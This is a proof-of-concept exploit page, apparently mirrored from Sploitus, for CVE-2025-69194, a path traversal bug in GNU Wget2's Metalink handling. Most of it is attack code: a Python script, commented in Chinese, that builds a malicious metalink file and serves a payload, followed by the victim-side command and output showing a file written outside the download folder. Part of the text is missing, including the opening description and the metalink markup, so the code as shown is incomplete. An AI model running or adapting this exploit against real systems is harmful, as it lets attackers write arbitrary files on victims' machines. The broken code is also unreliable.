Share
## https://sploitus.com/exploit?id=81FFE1A9-5CC7-59A3-A510-1163B8BF8CB5
# CVE-2025-69194: GNU Wget2 Path Traversal Vulnerability

## 📝 Description

PoC for **CVE-2025-69194**, a critical Path Traversal vulnerability in **GNU Wget2 

  
    
      {file_size}
      
        {sha256_hash}
      
      
        http://127.0.0.1:{PORT}/{PAYLOAD_FILE}
      
    
  

'''
    with open(METALINK_FILE, "w") as f:
        f.write(metalink_content)
    print(f"[+] 恶意文件 {METALINK_FILE} 已生成。")


def start_server():
    handler = http.server.SimpleHTTPRequestHandler
    with socketserver.TCPServer(("", PORT), handler) as httpd:
        print(f"[*] 恶意服务器已在端口 {PORT} 启动...")
        httpd.serve_forever()


if __name__ == "__main__":
    # 清理旧文件
    if os.path.exists(TARGET_FILE_NAME):
        os.remove(TARGET_FILE_NAME)

    create_files()

    # 启动后台服务器
    server_thread = threading.Thread(target=start_server, daemon=True)
    server_thread.start()

    time.sleep(1)  # 等待服务器就绪

    print("\n[!] 现在请在另一个终端执行以下命令进行复现:")
    print(f"wget2 --force-metalink -i {METALINK_FILE}")
    print(f"\n[!] 执行后,检查目标文件是否存在:")
    print(f"ls {TARGET_FILE_NAME} && cat {TARGET_FILE_NAME}")

    # 保持主线程运行
    try:
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        print("\n[+] 演示结束,正在清理...")


```

### 2. Victim Side (Triggering the Exploit)

Run the following command in a sub-directory (e.g., `~/Downloads/CVE-2025-69194/`) to observe the directory escape:

```bash
# Pre-check: Verify the file does not exist in the parent's parent directory
ls ../../pwned_test.txt

# Execute the exploit
wget2 --force-metalink -i exploit.metalink

```

---

## 📊 Technical Analysis

The vulnerability exists in the Metalink parsing logic where the `name` attribute is trusted without normalization.

| Phase | Description |
| --- | --- |
| **Input** | Wget2 reads ``. |
| **Bypass** | No check is performed to see if the path contains `../` or attempts to leave the CWD. |
| **Write** | Wget2 opens the resolved path `CWD + ../../pwned_test.txt` and writes the verified payload. |

---

## 📝 Sample Output (Verified)

As demonstrated in the successful reproduction, the file `pwned_test.txt` was created two levels above the execution folder:

```text
lele@u22:~/Downloads/CVE-2025-69194$ ls ../../pwned_test.txt
ls: cannot access '../../pwned_test.txt': No such file or directory

lele@u22:~/Downloads/CVE-2025-69194$ wget2 --force-metalink -i exploit.metalink
downloading part 1/1 (0-23) ../../pwned_test.txt from 127.0.0.1
HTTP response 200 OK [http://127.0.0.1:8000/evil.dat]
part 1 downloaded
../../pwned_test.txt checking...
Checksum OK for '../../pwned_test.txt'

lele@u22:~/Downloads/CVE-2025-69194$ ls ../../pwned_test.txt && cat ../../pwned_test.txt
../../pwned_test.txt
pwned by CVE-2025-69194

```

---

![version](./version.png)
![poc](./poc.png)
![test](./test.png)
## ⚠️ Disclaimer

This tool is provided for **educational and authorized security testing purposes only**. The author is not responsible for any damage caused by the misuse of this information. Unauthorized access to computer systems is strictly prohibited.